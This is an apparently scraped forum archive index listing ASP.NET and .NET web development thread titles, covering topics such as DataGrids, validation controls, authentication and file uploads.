happy building!
http://learn.iotcommunity.io/t/howto-create-an-iot-community-world-map-with-location-air-quality-temperature-humidity/288
CC-MAIN-2017-51
refinedweb
545
52.39
Why drop the I if you're going to just add an Impl? I was perusing the TopShelf source code this morning, trying to track down a change in the hosting API, when I discovered that the TopShelf team has succumbed to the new drop the 'I' in interface names meme. It's new to the .NET scene anyway, the java guys have been doing it for a while like all new good ideas in .NET. That were not stolen from ruby anyway. If you are unfamiliar, the gist of the meme is it is unnecessary to add the 'I' in front of an interface name because the consumer of the interface does not care that it is an interface and the 'I' is a form of Hungarian notation that the civilized world has all agreed is a bad practice. So your.. public interface ISomeBehavior { } ..should be.. public interface SomeBehavior { } And this makes a kind of sense. Where it breaks down is when you see a class that implements the interface that is named like this. public interface SomeBehavior { } public class SomeBehaviorImpl { } I am not quite sure what benefit is in moving the 'I' from the interface to the implementation and adding three characters. What have I gained beyond adding to my carpel tunnel? Does my consuming code care somehow that that this is an implementation of some 'I'-less interface? At some fundamental level, an interface is a contract. That contract states that the class that implements the interface provides an specific usable set of methods and properties. An other way to look at this is that the interface is a behavior. Consider the IDisposable interface provided by .NET. There is no DisposableImpl floating around. The interface describes a characteristic of the implementing type, that it behaves like a disposable thing. Your interfaces need not be a one to one relationship with the implementing class. In fact, your classes can implement multiple SRP friendly interfaces. To quote Brett L. Schuchert: class Manager : public ISing, public IDance {} ;-) Keep your interfaces clean, let the managers violate all they want So, I am sure you making angry face at my blog right now thinking, "Ok, mister smarty pants, what should I do then." To that I say, I like the 'I', but I use it so that it reads like a declaration. public interface IReadFiles { } public interface ICalculateRates { } public interface ISingAndDance {//OMG SRP VIOLATION!} And you may find that as preposterous as I find the 'I'/'Impl' meme. But that's cool. To each his own, but that damn 'Impl' stuff is not mine. This post brought to you by Negatron. Share this story About Author I am a passionate engineer with an interest in shipping quality software, building strong collaborative teams and continuous improvement of my skills, team and the product.
https://iamnotmyself.com/2011/04/26/why-drop-the-i-if-youre-going-to-just-add-an-impl/
CC-MAIN-2017-39
refinedweb
470
63.7
- Type: Bug - Status: Resolved (View Workflow) - Priority: Minor - Resolution: Not A Defect - Component/s: workflow-cps-global-lib-plugin - Labels: - Environment:Jenkins ver 2.46.3 Pipeline: Shared Groovy Libraries ver 2.8 - Similar Issues: Hi there, I love the idea of using shared libraries! I've been trying to use it - quite successfully - until I started using resources. I have a directory layout similar to the one described in the documentation. Inside my library I have a class rendering an html template (would be Bar.groovy). This template is in the resource directory (would be bar.json). Unfortunately, I just can't manage to retrieve the path of the resource using: this.class.getResource("org/foo/bar.json") This always returns "null" when executed on a Jenkins server while it does return the correct file path when running locally on my machine. However, the following works like a charm: def request = libraryResource 'org/foo/bar.json' Is this a bug or am I doing something wrong? Any help much appreciated I mean you can try src/the/pkg/resource.json and the.pkg.SomeClass.getResource('resource.json') may work. But the tested and recommended way to package resources is libraryResource. It's a pity libraryResource() is shy about selecting the currently active implicit library's resource. Instead I get an error, hudson.AbortException: Library resource com/COMPANY/FILE.EXT ambiguous among libraries [VER1, VER2] If the pipeline plugin has a way to select the innermost folder's implicit library, it could apply the same algorithm (or stick to the active version) when resolving the library resource. Ilguiz Latypov’s comment is unrelated to the reported issue, but at any rate: perhaps you are selecting distinct names for the “same” library, which is not wise since it would result in both versions of the library being loaded in one build. Please use the users’ list for advice. I also get into this problem. In my scenario I don't know if the resource file exists and want to get a null value if not exist. this is exact behavior of this.class.getResource("org/foo/bar.json") which is always returning null when executed with Jenkins pipeline even the file exists With libraryResource there will be an exception which not what I need . It is possible to catch the exception but it will show as an error in grafana. so I need to avoid exception. is there a way with libraryResource to return null if resource does not exists Ok. Let's drop it. If I am the only affected it's not worth it. Thanks Jesse Glick. Cheers,
https://issues.jenkins-ci.org/browse/JENKINS-45041?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
CC-MAIN-2019-35
refinedweb
439
58.69
How do I go about encoding an image to base64? I would like to store images in a database using this method. I have successfully converted a base64 string to an image and am using it in my project. Most of the information I have found works with strings. Like the following example. byte[] bytesToEncode = Encoding.UTF8.GetBytes (inputText); string encodedText = Convert.ToBase64String (bytesToEncode); This is simple enough, but what do I do with an image? This is how I am loading my image. byte[] b64_bytes = System.Convert.FromBase64String(b64_string); tex = new Texture2D(1,1); tex.LoadImage(b64_bytes); Any help will be hugely appreciated. Thank You Oh, I am working in C#. Answer by kamgru123 · May 22, 2014 at 11:29 AM EDIT: Apparently you can't serialize Texture2D (which I didn't know). But there's an easier solution: Texture2D.EncodeToPng() which returns byte array. Texture2D mytexture; byte[] bytes; bytes = mytexture.EncodeToPng(); The following text is wrong. Don't use it :P You could use BinaryFormatter to serialize it to bytes and then encode it. using System.Runtime.Serialization.Formatters.Binary; byte[] bytes; using (MemoryStream ms = new MemoryStream()) { BinaryFormatter bf = new BinaryFormatter(); bf.Serialize(ms, tex); bytes = ms.ToArray(); } string enc = Convert.ToBase64String(bytes); Hi Kamgru, Thanks for your quick reply! Im getting this error message though. "SerializationException: Type UnityEngine.Texture2D is not marked as Serializable." Sweet! thanks man. Works! Hi How did you solve the serialisation problem ? The serialization problem can't be solved, because Texture2d can't be serialized by any .Net serialization method. You should use EncodeToPng and Convert.ToBase64String just like the answer suggests. Base64 is just a way to encode any binary data as printable text. Hello, Can you please do the same in JS? im trying to upload an image to a database but im not good on C#. Thanks! Answer by BytesCrafter · Aug 09, 2016 at 09:01 AM public RawImage prevUserPhoto = ; This must be not null! Put a texture wd here! public RawImage newUserPhoto = ; Leave this null. This is where decoded texture go. ToLoad Image saved on PlayerPrefs as "string" ToLoad Image saved on PlayerPrefs as "string" ToLoad Image saved on PlayerPrefs as "string" Texture2D newPhoto = new Texture2D (1, 1); newPhoto.LoadImage(Convert.FromBase64String(PlayerPrefs.GetString("PhotoSaved"))); newPhoto.Apply (); newUserPhoto = newPhoto; ToSave Image from a Texture 2D which must be a "readable" and RGBA 32 format. ToSave Image from a Texture 2D which must be a "readable" and RGBA 32 format. ToSave Image from a Texture 2D which must be a "readable" and RGBA 32 format. string stringData = Convert.ToBase64String (prevUserPhoto .EncodeToJPG ()); //1 PlayerPrefs.SetString(PhotoSaved, string can I convert UTF8 string to arabic? 2 Answers PlayerPrefs not storing string? 0 Answers Encoding GIF access Denied 0 Answers video media encoder addframe texture format 5 expected to be 4 0 Answers Real-time Image Compression/Encoding on GPU 0 Answers
https://answers.unity.com/questions/712673/how-to-encode-an-image-to-a-base64-string.html
CC-MAIN-2018-47
refinedweb
479
53.58
pub_release 3.0.0 pub_release: ^3.0.0 copied to clipboard Use this package as an executable Install it You can install the package from the command line: dart pub global activate pub_release Use it The package has the following executables: $ github_release $ github_workflow_release $ pub_release Use this package as a library Depend on it Run this command: With Dart: $ dart pub add pub_release This will add a line like this to your package's pubspec.yaml (and run an implicit dart pub get): dependencies: pub_release: ^3.0.0 Alternatively, your editor might support dart pub get. Check the docs for your editor to learn more. Import it Now in your Dart code, you can use: import 'package:pub_release/pub_release.dart';
https://pub.dev/packages/pub_release/versions/3.0.0/install
CC-MAIN-2022-05
refinedweb
119
53.21
Unity automatically defines how scriptsA piece of code that allows you to create your own Components, trigger game events, modify Component properties over time and respond to user input in any way you like. More info See in Glossary compile to managed assemblies. Typically, compilation times in the Unity Editor for iterative script changes increase as you add more scripts to the Project. Use an assembly definition file to define your own managed assemblies based upon scripts inside a folder. To do this, separate Project scripts into multiple assemblies with well-defined dependencies in order to ensure that only required assemblies are rebuilt when making changes in a script. This reduces compilation time. Think of each managed assembly as a single library within the Unity Project. Figure 1 above illustrates how to split the Project scripts into several assemblies. Changing only scripts in Main.dll causes none of the other assemblies to recompile. Since Main.dll contains fewer scripts, it also compiles faster than Assembly-CSharp.dll. Similarly, script changes in only Stuff.dll causes Main.dll and Stuff.dll to recompile. Assembly definition files are Asset files that you create by going > Assembly Definition. They have the extension .asmdef. Add an assembly definition file to a folder in a Unity Project to compile all the scripts in the folder into an assembly. Set the name of the assembly in the InspectorA Unity window that displays information about the currently selected GameObject, Asset or Project Settings, alowing you to inspect and edit the values. More info See in Glossary. Note: The name of the folder in which the assembly definition file resides and the filename of the assembly definition file have no effect on the name of the assembly. Add references to other assembly definition files in the Project using the Inspector too. To view the Inspector, click your Assembly Definition file and it should appear. To add a reference, click the + icon under the References section and choose your file. Unity uses the references to compile the assemblies and also defines the dependencies between the assemblies. To mark the assembly for testing, enable Test Assemblies in the Inspector. This adds references to unit.framework.dll and UnityEngine.TestRunner.dll in the Assembly Definition file. When you mark an assembly for testing, makes sure that: Predefined assemblies (Assembly-CSharp.dll etc.) do not automatically reference Assembly Definition Files flagged for testing. The assembly is not included in a normal build. To include the assemblies in a player build, use BuildOptions.IncludeTestAssemblies in your building script. Note that this only includes the assemblies in your build and does not execute any tests. Note: If you use the unsafe keyword in a script inside an assembly, you must enable the Allow ‘unsafe’ Code option in the Inspector. This will pass the /unsafe option to the C# compiler when compiling the assembly. You set the platform compatibility for the assembly definition files in the Inspector. You have the option to exclude or include specific platforms. Having multiple assembly definition files (extension: .asmdef) inside a folder hierarchy causes each script to be added to the assembly definition file with the shortest path distance. Example: If you have an Assets/ExampleFolder/MyLibrary.asmdef file and the Assets > ExampleFolder > ExampleFolder2 folder will be compiled into the Assets/ExampleFolder/MyLibrary.asmdef defined assembly. Note: The assembly definition files are not assembly build files. They do not support conditional build rules typically found in build systems. This is also the reason why the assembly definition files do not support setting of preprocessor directives (defines), as those are static at all times. a assembly definition file folder does the UnityEditor.Compilation namespace there is a static CompilationPipeline class that you use to retrieve information about assembly definition files and all assemblies built by Unity. Assembly definition files are JSON files. They have the following fields: Do not use the includePlatforms and excludePlatforms fields in the same assembly definition file. Retrieve the platform names by using CompilationPipeline.GetAssemblyDefinitionPlatforms. MyLibrary.asmdef { "name": "MyLibrary", "references": [ "Utility" ], "includePlatforms": ["Android", "iOS"] } MyLibrary2.asmdef { "name": "MyLibrary2", "references": [ "Utility" ], "excludePlatforms": ["WebGL"] } 2018–03–07 Page published with limited editorial review New feature in 2017.3 NewIn20173 Custom Script Assemblies updated in 2018.1 Did you find this page useful? Please give it a rating:
https://docs.unity3d.com/Manual/ScriptCompilationAssemblyDefinitionFiles.html
CC-MAIN-2019-09
refinedweb
718
50.73
Support Python 2 with Cython Summary Many popular Python packages are dropping support for Python 2 next month. This will be painful for several large institutions. Cython can provide a temporary fix by letting us compile a Python 3 codebase into something usable by Python 2 in many cases. It’s not clear if we should do this, but it’s an interesting and little known feature of Cython. Background: Dropping Python 2 Might be Harder than we Expect Many major numeric Python packages are dropping support for Python 2 at the end of this year. This includes packages like Numpy, Pandas, and Scikit-Learn. Jupyter already dropped Python 2 earlier this year. For most developers in the ecosystem this isn’t a problem. Most of our packages are Python-3 compatible and we’ve learned how to switch libraries. However, for larger companies or government organizations it’s often far harder to switch. The PyCon 2017 keynote by Lisa Guo and Hui Ding from Instagram gives a good look into why this can be challenging for large production codebases and also gives a good example of someone successfully navigating this transition. It will be interesting to see what happens when Numpy, Pandas, and Scikit-Learn start publishing Python-3 only releases. We may uncover a lot of pain within larger institutions. In that case, what should we do? (Although, to be fair, the data science stack tends to get used more often in isolated user environments, which tend to be more amenable to making the Python 2-3 switch than web-services production codebases). Cython The Cython compiler provides a possible solution that I don’t hear discussed very often, so I thought I’d cover it briefly.. Lets see an example… Example Here we show a small Python project that uses Python 3 language features. (source code here) py32test$ tree . . ├── py32test │ ├── core.py │ └── __init__.py └── setup.py 1 directory, 3 files # py32test/core.py def inc(x: int) -> int: # Uses typing annotations return x + 1 def greet(name: str) -> str: return f'Hello, {name}!' # Uses format strings # py32test/__init__.py from .core import inc, greet We see that this code uses both typing annotations and format strings, two language features that are well-loved by Python-3 enthusiasts, and entirely inaccessible if you want to continue supporting Python-2 users. We also show the setup.py script, which includes a bit of Cython code if we’re running under Python 2. # setup.py import os from setuptools import setup, find_packages import sys if sys.version_info[0] == 2: from Cython.Build import cythonize kwargs = {'ext_modules': cythonize(os.path.join("py32test", "*.py"), language_level='3')} else: kwargs = {} setup( name='py32test', version='1.0.0', packages=find_packages(), **kwargs ) This package works fine in Python 2 >>> import sys >>> sys.version_info sys.version_info(major=2, minor=7, micro=14, releaselevel='final', serial=0) >>> import py32test >>> py32test.inc(100) 101 >>> py32test.greet(u'user') u'Hello, user!' In general things seem to work fine. There are a couple of gotchas though Potential problems We can’t use any libraries that are Python 3 only, like asyncio. Semantics may differ slightly, for example I was surprised (though pleased) to see the following behavior. >>> py32test.greet('user') # <<--- note that I'm sending a str, not unicode object TypeError: Argument 'name' has incorrect type (expected unicode, got str) I suspect that this is tunable with a keyword parameter somewhere in Cython. More generally this is a warning that we would need to be careful because semantics may differ slightly between Cython and CPython. Introspection becomes difficult. Tools like pdb, getting frames and stack traces, and so forth will probably not be as easy when going through Cython. Python 2 users would have to go through a compilation step to get development versions. More Python 2 users will probably just wait for proper releases or will install compilers locally. Moved imports like the from collections.abc import Mappingare not supported, though presumably changes like this could be baked into Cython in the future. So this would probably take a bit of work to make clean, but fortunately most of this work wouldn’t affect the project’s development day-to-day. Should we do. However, as someone who maintains a sizable Python-2 compatible project that is used by large institutions, and whose livelihood depends a bit on continued uptake, I’ll admit that I’m hesitant to jump onto the Python 3 Statement. For me personally, seeing Cython as an option to provide continued support makes me much more comfortable with dropping Python. blog comments powered by Disqus
https://matthewrocklin.com/blog/work/2018/11/28/python-2-and-cython
CC-MAIN-2019-09
refinedweb
770
65.12
How to get list of relative primes for a given number? How to get list of relative primes for a given number? Is there any direct sage function? How to get list of relative primes for a given number? Is there any direct sage function? This is my custom function to get list of relative primes def getRelativePrimeList(n): L = []; for i in range(1,n): if gcd(i,n)==1: L.append(i); return L;) Asked: 2019-02-02 08:25:02 -0500 Seen: 579 times Last updated: Feb 03 '19 Product of primes not dividing $N$ in SAGE. How would I be able to check if a given number is a solinas prime? Finite field with a big prime Error: 'Object has no attribute 'intersection'' List of prime factors with repetition How to find instances where $d(a,b) = p^2$ for $p$ a prime ValueError: too many values to unpack Prime ideals and "Point on Spectrum" reading, computing, writing Convert from int to double and back in Cython
https://ask.sagemath.org/question/45274/how-to-get-list-of-relative-primes-for-a-given-number/?sort=oldest
CC-MAIN-2020-24
refinedweb
171
70.84
When i run my code i receive the following error: Fatal error: Call to a member function fetch() on a non-object in C:\Program Files\EasyPHP-5.3.8.0\www\Practice\staff.php on line 20 The code that causes the error is: <?php require_once "db_connect.php"; $dbh = db_connect (); $dbh->exec ("CREATE TABLE Staff( UserId int NOT NULL AUTO_INCREMENT, PRIMARY KEY(UserId), Username varchar(65) NOT NULL, Password varchar(65) NOT NULL )"); $dbh->exec ("INSERT INTO Staff (UserId, Username, Password) VALUES (0000, 'Ben', 'Password')"); $sql = "SELECT * FROM Staff"; $stmt = $dbh->query($sql); $result = $stmt->fetch(PDO::FETCH_ASSOC); foreach($result as $key=>$val){ echo "$val"; } ?> The files also included are: db_connect.php <?php function db_connect () { include'db_connection.inc'; $dbh = new PDO("mysql:host=127.0.0.1;$database", $user, $password); return ($dbh); } ?> and : db_connection.inc <?php $host = 'mysql:host=127.0.0.1;'; $user = 'root'; $password = 'mysql'; $database = 'library_db'; ?> I know the error states what is wrong but i am not sure which PDO fetch command i should be using or if there is anything else i am doing wrong. What i want for it to do is print out the values of the record in the Staff table. Any help is appreciated, thanks.
https://www.daniweb.com/programming/web-development/threads/387728/error-dealing-with-pdo-fetch
CC-MAIN-2018-47
refinedweb
205
58.58
Unlike the newer languages, 'C' and 'C++' do not have a built-in foreach operation. Looping over the containers is one of the most common operations. A foreach simplifies writing and reading of code. Here, a simple approach is suggested to avail this facility in C++. foreach If you search the net, you will find long winded discussions on how to implement this facility using complex macros, conditional operators ?:, multi line macro definitions, code having dependency on STL or boost or other libraries, preprocessor programs, convoluted expressions for type safety etc.. ?: What I present here, uses three lines of macros that you need to place in your headers, then implement an interface and enjoy a cross platform solution with type safety. Simplicity has been the prime goal. Take a look at the following (desired) program fragments: #include "files.hpp" typedef const char *CSTR; extern void find_replace(CSTR filename, CSTR from, CSTR to); void change() { Files files("*.htm"); foreach(files) { find_replace(files.current(), "(c) 2005", "(c) 2006"); } } and.. void bill() { Clients clients; Invoices invoices; Services services; foreach(clients) { cout << "Client: " << clients.current().name() << endl; invoices = clients.current(); foreach(invoices) { cout << "Invoice #: " << invoices.current().number() << endl; services = invoices.current(); foreach(services) { cout << services.current() << endl; } } } } Note that in each of these cases, there are no iterators, it is not known (totally encapsulated) whether these are STL containers or not! Thus, we want to achieve two goals at the same time: mainly, simplicity in writing the code; and secondly, information hiding - so that the implementation (STL containers or not) does not dictate the use. Well, in these examples, some of the 'containers' are STL compliant and some are not. This method allows you to achieve the same consistent usage nevertheless; without losing STL's efficiency, generality, and extensibility wherever you can; while keeping the interface utterly simple. Correctly speaking, I should say, there are no open, 'visible' iterators! Looping often involves two types of containers: those holding simple (POD - plain old data: ints, doubles, chars) types and those holding abstract data types (objects of some class). int double char char line[80] for(i=0; i < ...) * Take a look at the following function, taken from actual usage. Lots of people write like this, so, this would be considered 'normal'. void bill() { Client client; // Loop over the clients for(Client::const_iterator ri = client.begin(); ri != client.end(); ++ri) { cout << (*ri).name() << endl; // Loop over the Invoices for(Invoices::const_iterator fi = (*ri).begin(); fi != (*ri).end(); ++fi) { cout << "Invoice #:" << (*fi).number() << endl; // Loop over the Services for(Services::const_iterator si = (*fi).begin(); si != (*fi).end(); ++si) cout << (*si) << endl; } cout << endl; } } In case, it is needed to add namespace specifiers like 'Projectname::Client::const_iterator' and 'std::cout', 'std::endl' everywhere, you can imagine the reading excitement this is going to cause! 'Projectname::Client::const_iterator' 'std::cout' 'std::endl' What I found utterly unacceptable for looping over object containers, as seen from this routine, was - declaring an iterator every time merely for looping, and having to type things like (*ri).number(). (*ri).number() Do you want to express the intent more clearly, type less and make it more maintainable? Tired of inventing new names for the iterators every time? Then recheck the foreach based version above. The formula for clearer code is achieved by combining the container with the iteration capabilities and encapsulating it as a single class. The foreach (described later) works for any class having the following member functions: class Cont { public: ... bool first(); bool next(); T current(); // T is the type of whatever that is contained herein // optional: T & operator()(); // Reference, hence good for mutables T & operator[](size_t index); // Sometimes useful.. protected: ... }; I started using this pattern before the STL surfaced, hence the names resemble the older iteration style. For STL based containers (or compatible - things made to behave like STL containers), this is equally simple to achieve: template < class T > class Container : public vector<T>{ protected : Container::iterator it; public : // Container(){} // ~Container(){} bool first(){ it = begin(); return it != end(); } bool next(){ ++it; return it != end(); } T current(){ return *it; } ... This is an example of a class holding objects of type 'T' in a vector. It could really be any of the other STL containers, suitable for the application at hand. The first() and next() are defined in terms of begin() and end(). Note how current() provides access to the desired contained object. Also note the use of ++it, as it++ would mean something quite different. All such traps are hidden, the users see only foreach. T first() begin() end() current() ++it it++ For other (non STL based) classes, first() positions to the first object, and next() to the next. Both return false if that can't be done. Surprising number of other objects will readily yield to this: files, configuration entries, fields in an HTML form, DBMS tables etc., where you would otherwise have to build code to make them STL iteration compliant, just to unify the looping. false The foreach is achieved by using the following macros: #define JOIN2(a,b) a##b #define JOIN(a,b) JOIN2(a,b) #define foreach(a) for(bool JOIN(flag,__LINE__)=a.first(); JOIN(flag,__LINE__);JOIN(flag,__LINE__)=a.next()) Contrary to the common macro naming conventions, I have left foreach in lower case as it comes out as a true single line for statement and avoids all possible problems with similar macros regarding dangling ifs, braces, etc. Simple, huh? for if So, to recapitulate, this foreach takes in any 'container' object with first(), next() defined for it, and provides access to each element using current(). The access to mutable objects can be provided using the operator(). operator() Every time it is used, my foreach creates a new <CODE lang=c++>bool flag variable, unique because it uses the current source line number as part of its name. This flag is never used again, so the actual name does not matter. It just needs to be unique, every time. According to the new standard, it will be forgotten when the scope of the for is over. Type safety is achieved as there is a separate class for each type of object container, the compiler does not need to know anything special about the objects being iterated over. My STL version as shown, evaluates end() once in first() and then again in next(). Change it if you have problems with that implementation. I use a template container version using direct STL containers and have not encountered a problem yet. For other things like 'Files' above, your implementations of first(), next() will depend upon whether you are using DOS, Win32 or Linux - all nicely hidden by the implementation. My understanding of STL is close to minimal, I just am sold on its efficiency. So, I use it whenever the readability does not suffer. I can always buy a faster computer, can't put in the readability later. Quite often, it makes sense to hold a copy of the contained item within the envelope, and use it as the 'current' value. Customers cust; foreach(cust){ cout << cust.name << "\t" << cust.phone << endl; } Here, attributes like name and phone are stored within the Customers class and set to the values of the current record in both first() and next(). Here, the container holds the object attributes and is the object itself. name phone Customers Alternatively, you can derive Customers (note the ending 's', therefore a set of customers) from Customers (single object) class, isolating the object and iterating concerns. Then, exactly the same code is usable: (Here the container is derived from the object). Once again, the usage does not tell the user anything about the underlying design aspects, they are not exposed. Note: In the examples given much earlier, the container and the objects are separate, hence copy operations may be invoked on the objects, when referred using current(). Under such conditions, following the regular C++ guidelines, don't forget to define the copy constructor and the copy operator if it contains anything but PODs. But this is common C++ programming, nothing specific about this implementation of foreach. copy Also, this foreach does not take two parameters as in foreach(i in iset), which would require the compiler to know about the container. So if and when the standard adds such a thing, you can easily distinguish between the two. foreach(i in iset) I had second thoughts about publishing this technique, as it is particularly obvious and simple, once shown. For long time, I had the impression that others must have stumbled on such a trivial solution earlier. Discussions in a newsgroup indicated otherwise. If nothing else, please treat this as a simple pattern that I found stable and have used in my code. I would compare this with #define dim(x) (sizeof(x)/sizeof(x[0])), which has saved me many chagrins, just define and use brainlessly. You can certainly code without it, and enjoy the debugging fun. #define dim(x) (sizeof(x)/sizeof(x[0])) A comment about the target level: this article should be useful for beginners and advanced users, as beginners readily will see the simple 'user' code; advanced users will understand the impact of seemingly simple solutions. The intermediates will most likely have too much code written to even think about changing anything! Beginners, please don't ask me the following: The example given is just that, an example. I do not endorse OpenRJ or derivatives. When I complained that the library and the usage examples could be simpler, the author wanted clarifications. My sample code had this foreach. It was revealed during further discussions that foreach could be useful to others. I wrote the test program first, then the alternate library implementations. The original library can be found at: Open-RJ (redirects to SourceForge). Thanks to Matthew Wilson for pointing me in the right direction! Much more involved discussions have been done about 'foreach' in C++. Most of these have complex implementation suggestions. Some of the discussions are at: 26th May, 2005: The technique is simple, and quite stable. Any suggestions for improvement? This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) <br /> Container:<br /> typedef value_type;<br /> typedef iterator;<br /> typedef const_iterator;<br /> typedef reference;<br /> typedef const_reference;<br /> typedef pointer;<br /> typedef difference_type;<br /> typedef size_type;<br /> <br /> begin()<br /> end()<br /> size()<br /> max_size()<br /> empty()<br /> swap(b)<br /> swap(a,b)<br /> <br /> Copy Constructor<br /> Destructor<br /> <br /> operator=<br /> operator==<br /> operator!=<br /> operator<<br /> operator><br /> operator<=<br /> operator>=<br /> <br /> <br /> Iterators:<br /> operator++<br /> operator*<br /> operator-><br /> operator==<br /> operator!=<br /> <br /> Default Constructor<br /> <br /> Mutable Iterators: (No need for mutable iterators unless you want them...)<br /> operator* (Returns reference to mutable value)<br /> General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/10488/Implementing-foreach-for-C-as-a-Design-Pattern?PageFlow=Fluid
CC-MAIN-2019-09
refinedweb
1,837
55.13
a36233: Install qt4 (uninstall qt5 if necessary) It is required to symlink qmake -> qmake-qt4 Then, the following error occurs: "SSLv3_client_method not declared in this scope". To solve this issue I replaced the respective function call argument with NULL (I know it's not a good idea). It compiles successfully. Search Criteria Package Details: cartao-cidadao-svn 1.0-0 Dependencies (9) Required by (0) Sources (1) Latest Comments agrr commented on 2016-03-30 16:20 0xACB commented on 2016-03-18 16:51 a36233: Install qt4 (uninstall qt5 if necessary) a36233 commented on 2016-01-27 22:38 main.cpp:22:23: fatal error: QPushButton: No such file or directory #include <QPushButton> You should replace SSLv3_client_method() with TLSv1_1_client_method() as the openssl package on Arch doesn't support SSLv3 anymore. I tested this change and it successfully connects to the address change server.
https://aur-dev.archlinux.org/packages/cartao-cidadao-svn/
CC-MAIN-2019-30
refinedweb
144
53.31
- CheckBoxes & DataGrids ASP.net - Status Bar - Time Zone question - ENCTYPE="Multipart/Form-Data" Any Drawbacks? - DropDownList not displayed on Mac - RegEx *URGENT* - adding onchange javascript that fires after doPostBack ? - Why is _ctl added to my servercontrols Id? - Id is changed on my server control! (_ctl5) - "Error while trying to run project" - translate VB -> CS - Identify wich button was pressed! - Treeview - not strictly an asp.net or C# question but?..... - Error - How to trigger textchanged event of a user control on page submit? - Error - Some doubt for .NET and HTML/Server button - Check blank text box using custom validator - asp:Literal & <!--includes--> - Render HTML page using ASP - a button inside a grid. - DOT.NET Hosts ? - word interactivity using aspx - How will I correct the error generated??? - Simple Question on appropriate control??? - Need dhtml code to make text glow red from black - listcontrol, checkboxlist, radiobuttonlist, placeholder - globalisation help needed! - format table in datagrid ? (0/1) - Data Grid - Problem with grid save link - Need help with page reload - accessing the readonly properties of a listmenu with a user control? - how do I get the page no of print-out for aspx? - 3 SQL queries in 1 string...in what order will they execute? - ValidatorOnSubmit() - Checking File Permissions - PostBack basic question - I am looking for FAX related namespace in .net. - dynamically loaded control event only reached on 2nd postback - asp.net cache corrupts image - I need to make IE buttons and menu's disappear. - Is it possible to host ASP.NET web application using Apache? - password protected access to files hosted by IIS - SQL Parameterized Queries with IN statement - "Server execution failed" when trying to use COM - Question: TimeSpan - Why can't I make a table cell any size I want? - HTTP/1.1 500 Internal Server Error - ASP.NET pages are no longer refreshing - datagrid controls - Question: Time comparisons - HttpWebRequest and the POST method from a win form app - How to show the UI of EXE in ASP.NET - set ASP.NET datagrid image based on SQL table value - Programmatically Resize Frameset Dimensions - Please help : System.Data.OleDb.OleDbException: Syntax error in IN - Data grid pageing with EnableViewState = False turned on - How to get a control... asp (c#) - Uncompiling asp.net - Issue with ConfigurationSettings.AppSettings - Redirecting from another frame - Request.QueryString looping....easy question... - Must implement IConvertable?! - Retrieve Client Screen Width - Do While Loop (ASP.NET) not working - "Object reference not set to an instance of an object" during InitializeComponent()??? - datagrid and leading spaces in fields - How to use Reponse.Redirect in ASP.NET Iin-line Code ? - Add comments - Authenticate the user - Tired. Annoyed. Really need help with Control serialization issues. Please... - OWC safe in ASP.NET? - value of textboxes in browser does not match what is in viewsource ? - DataBinding on PostBack? - ASP.NET on Server 2003 - Painfully Slow to Process Page? - how to save the out html to a html file on server disk automatically ? - Trying to find a better way to clear textboxes - dll problems in an ASP.NET application - clickable validator - HTTP 1.1 Compression - does this make application really faster ? - inherit from class which inherits from Page class - DataList Alternate Style - Can only write to root of disk - version numbers and releasing software... - XSL Transformation - Dynamic Generation of XML Content - Kerberos / Authentication to SQL2K - validation for User Control - Relative URL's to absolute URL's function ? - Datasets and business objects - File properties - HttpResponse from background thread - List object in a page - Working with Connection object - Functions of FormsAuthenticationTicket - multi-threading - VS.NET designer removes runat='server' attribute in <title> - dispose and nothing? whats the main difference? - Question: "Access to path denied" message - Datagrid non bound data - Dynamic loaded webcontrol instantiation - Dataset to table - Processing delimited list then adding to listbox in java script - Dynamic controls - dropdownlist woes - Script - Reposition Control - RegisterClientScriptBlock - URGENT please - Accessing a Network Directory - Datagrid handling - Help! Problems with custom TypeConverter and Persistence... - Best Way To Break Up Large ASP.NET Apps - Howto put the CodeBehind in a Class Library? - Login failed for user '(null)'. Reason: Not associated with a trusted SQL Server connection. - File Field Validation question - File Field Validation question - File Field Validation question - Is it supported to render a ASP.NET user control in Excel - iFrame replacement - HTML/ASPX question - Help with ASPX Style Sheet - Can someone help with this response.text? - Referencing value of a dynamically created control - ListBox and SelectedItem.Value - ASP.NET /Classic ASP Security Mix - Element in Form - SmartNavigation, PostBack, and Filters are crashing IE 6 - Displaying different controls in repeater, depending on condition - asp.net setfocus after validation not working - Calendar control questions - Book Recommendations - "Access is denied" error with Indexing Service turned off - Does it work in 1.1? - Added TemplateColumn is not showing in DataGrid after PostBack - Please Help.It is very urgent - Streaming a File from a Web Service - Dataset containing html tag - NEWB Q: Do I use a repeater? - Diagnostics.Process class and ASP.NET - Custom configuration section handlers - Custom E-Mail In Hosted Environment - Apply css to asp:HyperLinkColumn - Question about DataTypeCheck Operator of comparevalidator - is this a hack? - running procedure at desktop not iis - Urgent: Integrate WebBrowser Control in ASP.NET/VB.NET? - Integrate WeBrow - Uploading Large File to SQL - Server.HTMLEncode and the # (pound) symbol - Problem Copying Web Project - Smart Navigation - Start external Process under different user account in ASP.NET??? - Single threaded class for COM interop - it's all about semantics - ASP.net architecture issue - How to Order these Records? - Need help on regular expression in .Net: - books for asp.net and crystal reports - Get UserPassword in ActiveDirectory - Dropdown viewstate probelm - firewall issues with web service? Need networking advice! - encoding problems (utf-8) - Get a Value from HTML Control to WEB Control - WebUserControl and JavaScript - Object reference not set to an instance of an object. - WebClient.DownloadFile creates an error ?? - How to use java class object in ASP.NET? - Can't cast as a textbox (VB) - Can I install tigether VS2003 and VS2005 on the same computer - Problem with button in asp.net - Error message - Error when user authentication in AD - ASP.NET validation controls not working on remote server + event handler - Permission check for secured subfolders? - Events involved with Checkbox in datagrid? - Error in obtain user group in AD - Generic Master detail class/form in asp.net - Dynamically Adding Controls - objects being rendered - SmtpMail Could not access 'CDO.Message' object ONLY with HTML form - Printing in A4 size... - How can I refresh a page? - Get Rid of '-- Web Page Dialog' in Title Bar - Using RadioButtonList Class object. - Page_Load event not executing - Button Event Not Firing From Dynamic WebControls on Web Farm. - Web Service? - Why event not firing right away - Having a timeout problem - Repost: New Session Created on Post Back! - SQL LIKE query with variable - Method for persisting all page state not just viewstate. - Client-Side Object Reference Quandry - hosting that provides iis app ext mappings - stuck on a REGEX (\S[^\s/>]*) - Geographic Databases - Winform won't display - Web Form Navigation - FILE UPLOADING IN ASP.NET or ASP for that matter - Getting error message 